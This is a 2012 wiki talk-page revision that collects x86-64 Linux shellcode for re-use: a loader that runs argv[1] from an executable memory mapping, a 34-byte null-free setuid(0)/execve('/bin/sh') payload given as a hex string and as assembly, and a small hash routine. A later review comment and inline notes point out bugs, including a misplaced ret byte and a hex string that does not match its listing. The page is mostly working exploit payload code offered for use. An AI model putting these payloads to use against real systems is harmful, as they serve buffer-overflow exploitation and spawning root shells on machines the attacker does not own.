Difference between revisions of "Category talk:Shellcode"
(Created page with "Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! ~~~~ ==...") |
(→Small one-way hashing algorithm) |
(6 intermediate revisions by one other user not shown) | |||
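--- a/Category talk:Shellcode
+++ b/Category talk:Shellcode
@@ -9,4 +9,69 @@
 ==== 64-bit ====
-
+===== Shellcode loader =====
+You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems.
+
+'''Usage:'''
+as inject.s -o inject.o ; ld inject.o -o inject
+./inject "$(echo -en "\x90\x90\x90")"
+* The above example will execute 3 no ops.
+{{code|text=<source lang="asm">
+.section .data
+.section .text
+.globl _start
+
+_start:
+pop %rbx # argc
+pop %rbx # arg0
+pop %rbx # arg1 pointer
+
+
+push $0x9
+pop %rax
+
+xor %rdi, %rdi
+push %rdi
+pop %rsi
+inc %rsi
+shl $0x12, %rsi
+
+push $0x7
+pop %rdx
+push $0x22
+pop %r10
+
+push %rdi
+push %rdi
+pop %r8
+pop %r9
+
+syscall # The syscall for the mmap().
+
+begin_inject:
+xor %rsi, %rsi
+push %rsi
+pop %rdi
+
+inject_loop:
+cmpb %dil, (%rbx, %rsi, 1)
+je inject_finished
+mov (%rbx, %rsi, 1), %r10
+mov %r10, (%rax,%rsi,1)
+inc %rsi
+jmp inject_loop
+
+inject_finished:
+inc %rsi
+movb $0xc3, (%rax, %rsi, 1)
+call *%rax
+
+exit:
+push $60
+pop %rax
+xor %rdi, %rdi
+syscall
+</source>}}
+
+===== setuid(0); execve('/bin/sh'); - 34 bytes =====
+[[User:Hatter|Hatter]] 05:27, 19 August 2012 (MSK)
 * '''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'''
 {{code|text=<source lang="asm">
@@ -35,2 +100,17 @@
 mov $0, %rdi
 syscall</source>}}
+
+===== Small one-way hashing algorithm =====
+{{code|text=<source lang="asm">
+compute_hash:
+xor %rcx, %rcx
+xor %rdx, %rdx
+
+compute_hash_again:
+sub (%rax, %rdx, 1), %cl
+rol $0xa, %rcx
+inc %rax
+cmp %dl, (%rax,%rdx,1)
+jne compute_hash_again
+ret
+</source>}}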
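Review bot: In the first hunk, `inject_finished` advances `%rsi` past the terminator before `movb $0xc3, (%rax, %rsi, 1)`, so the ret lands at index len+1 while index len still holds the 0x00 copied by the last 8-byte `mov`, and the pair `00 c3` is decoded as `add %al, %bl` rather than as a bare `ret`; writing the ret at the index where `cmpb` found the NUL, i.e. dropping that `inc %rsi`, keeps the return where the surrounding comments imply it. The same loop copies a quadword per iteration while advancing one byte, so it reads up to 7 bytes past the end of argv[1] into the neighbouring argv/envp strings, with no argument argv[1] is NULL so the first `cmpb` faults, and the `mmap` result is used as a destination without a `cmp $-4095, %rax` / `jae exit` check, so a failed mapping is written through as an address. For the second hunk, `compute_hash` states no register contract, so I would add a header such as `# In: %rax = NUL-terminated string   Out: %rcx = hash   Clobbers: %rax, %rdx, flags`, and note that because `cmp %dl, (%rax,%rdx,1)` runs after `inc %rax`, an empty string hashes its own terminator and the compare reads one byte past it.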
Latest revision as of 14:51, 17 September 2012
Hey guys, thought we could use some collections of this stuff for re-use purposes. Let's only contribute things we wrote ourselves, no copy-pasting others' code please! Hatter 05:23, 19 August 2012 (MSK)
Collections
This page needs shellcode and will be updated with it shortly. Thanks for your patience.
Windows
Linux
64-bit
Shellcode loader
You shouldn't need to use this algorithm as a buffer-overflow payload, but it's null-free just in case. For 64-bit Linux kernel 3 systems.
Usage:
as inject.s -o inject.o ; ld inject.o -o inject
./inject "$(echo -en "\x90\x90\x90")"
- The above example will execute 3 no-ops.
# AT&T/GAS syntax, x86-64 Linux syscall ABI (nr in %rax; args in
# %rdi, %rsi, %rdx, %r10, %r8, %r9; %rcx and %r11 clobbered by syscall).
# Standalone program: copies argv[1] into a fresh anonymous RWX mapping,
# appends a ret (0xc3) after it, calls it, then exits with status 0.
# Register roles: %rbx = argv[1], %rax = mapping base, %rsi = byte index,
# %rdi = 0 (its low byte %dil doubles as the NUL comparison value).
.section .data
.section .text
.globl _start

_start:
    pop %rbx                        # argc (discarded)
    pop %rbx                        # arg0 (discarded)
    pop %rbx                        # arg1 pointer: %rbx = argv[1]
                                    # NOTE(review): with no argument argv[1] is NULL and the
                                    # first cmpb below dereferences address 0

    push $0x9                       # %rax = 9 = SYS_mmap; push/pop of small immediates keeps
    pop %rax                        # the encoding free of zero bytes

    xor %rdi, %rdi                  # addr = NULL (kernel picks the address)
    push %rdi
    pop %rsi                        # %rsi = 0 ...
    inc %rsi                        # ... = 1 ...
    shl $0x12, %rsi                 # ... = 1 << 18 = 0x40000 bytes of length

    push $0x7                       # prot = 7 = PROT_READ|PROT_WRITE|PROT_EXEC: a mapping that is
    pop %rdx                        # both writable and executable, which W^X/execmem policies may deny
    push $0x22                      # flags = 0x22 = MAP_PRIVATE|MAP_ANONYMOUS
    pop %r10

    push %rdi
    push %rdi
    pop %r8                         # fd = 0 (ignored for MAP_ANONYMOUS)
    pop %r9                         # offset = 0

    syscall                         # The syscall for the mmap(); %rax = mapping base
                                    # NOTE(review): result is not checked -- on failure %rax holds
                                    # -errno and the copy loop below writes through it as an address

begin_inject:
    xor %rsi, %rsi                  # index = 0 into both argv[1] and the mapping
    push %rsi
    pop %rdi                        # %rdi = 0, so %dil is the 0x00 terminator to look for

inject_loop:
    cmpb %dil, (%rbx, %rsi, 1)      # stop at the NUL that ends argv[1]
    je inject_finished
    mov (%rbx, %rsi, 1), %r10       # copies 8 bytes per step but advances 1 byte: the qwords
    mov %r10, (%rax,%rsi,1)         # overlap, and the last one reads up to 7 bytes past the NUL
    inc %rsi
    jmp inject_loop

inject_finished:
    inc %rsi                        # NOTE(review): moves the index to len+1, so the ret byte is
    movb $0xc3, (%rax, %rsi, 1)     # placed after the copied 0x00 at index len; the pair 00 c3
    call *%rax                      # decodes as add %al,%bl, not as a bare ret. Run the copied bytes.

exit:
    push $60                        # %rax = 60 = SYS_exit
    pop %rax
    xor %rdi, %rdi                  # status = 0
    syscall
setuid(0); execve('/bin/sh'); - 34 bytes
Hatter 05:27, 19 August 2012 (MSK)
- \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05 (this hex string is a separate, NUL-free encoding; it is not a byte-for-byte assembly of the listing below)
# AT&T/GAS syntax, x86-64 Linux syscall ABI (nr in %rax; args in %rdi,
# %rsi, %rdx; %rcx and %r11 clobbered by syscall).
# Standalone program: setuid(0), then execve("/bin/sh", argv, envp) with
# argv and envp both pointing at an empty (single NULL) array; the final
# exit(0) only runs if execve returned, i.e. failed.
# NOTE(review): the `mov $0, %rdi` / `mov $105, %rax` forms encode zero
# bytes, so this listing is not the source of the NUL-free hex string
# above it (which opens with \x48\x31\xff = xor %rdi,%rdi).
.section .data
.section .text
.globl _start

_start:
    mov $0, %rdi                    # uid = 0
    mov $105, %rax                  # %rax = 105 = SYS_setuid
    syscall                         # syscall arguments are read from %rdi, %rsi, %rdx (in that order)
                                    # NOTE(review): the result is ignored; when setuid fails (EPERM
                                    # without an effective/saved uid of 0) execve still runs, just
                                    # without the privilege the heading implies

    mov $59, %rax                   # %rax = 59 = SYS_execve(filename, argv, envp)
    push $0x00                      # one NULL pointer on the stack = an empty, NULL-terminated array
    mov %rsp, %rdx                  # envp (%rdx) -> that empty array
    mov %rsp, %rsi                  # argv (%rsi) -> the same empty array
    mov $0x0068732f6e69622f, %rcx   # memory bytes 2f 62 69 6e 2f 73 68 00 = "/bin/sh\0" (little-endian)
    push %rcx
    mov %rsp, %rdi                  # filename is '/bin/sh\0'
    syscall

    mov $60, %rax                   # %rax = 60 = SYS_exit; reached only if execve returned
    mov $0, %rdi                    # status = 0
    syscall
Small one-way hashing algorithm
# compute_hash: rotate-and-subtract hash of a NUL-terminated byte string
# (AT&T/GAS syntax, x86-64; no calling convention is stated on the page).
# In:    %rax = pointer to the string
# Out:   %rcx = 64-bit hash; %rax is left pointing at the terminating NUL
# Clobb: %rdx (left at 0), flags
compute_hash:
    xor %rcx, %rcx                  # hash = 0
    xor %rdx, %rdx                  # %rdx = 0 for the whole routine: a zero index, and %dl the 0x00 to compare against

compute_hash_again:
    sub (%rax, %rdx, 1), %cl        # hash.low8 -= *p; the borrow does not propagate into the upper 56 bits
    rol $0xa, %rcx                  # rotate the full 64-bit hash left by 10
    inc %rax                        # p++
    cmp %dl, (%rax,%rdx,1)          # continue while the byte at the new p is non-zero
    jne compute_hash_again          # NOTE(review): the first byte is hashed before any check, so an
    ret                             # empty string hashes its NUL and the cmp reads one byte past it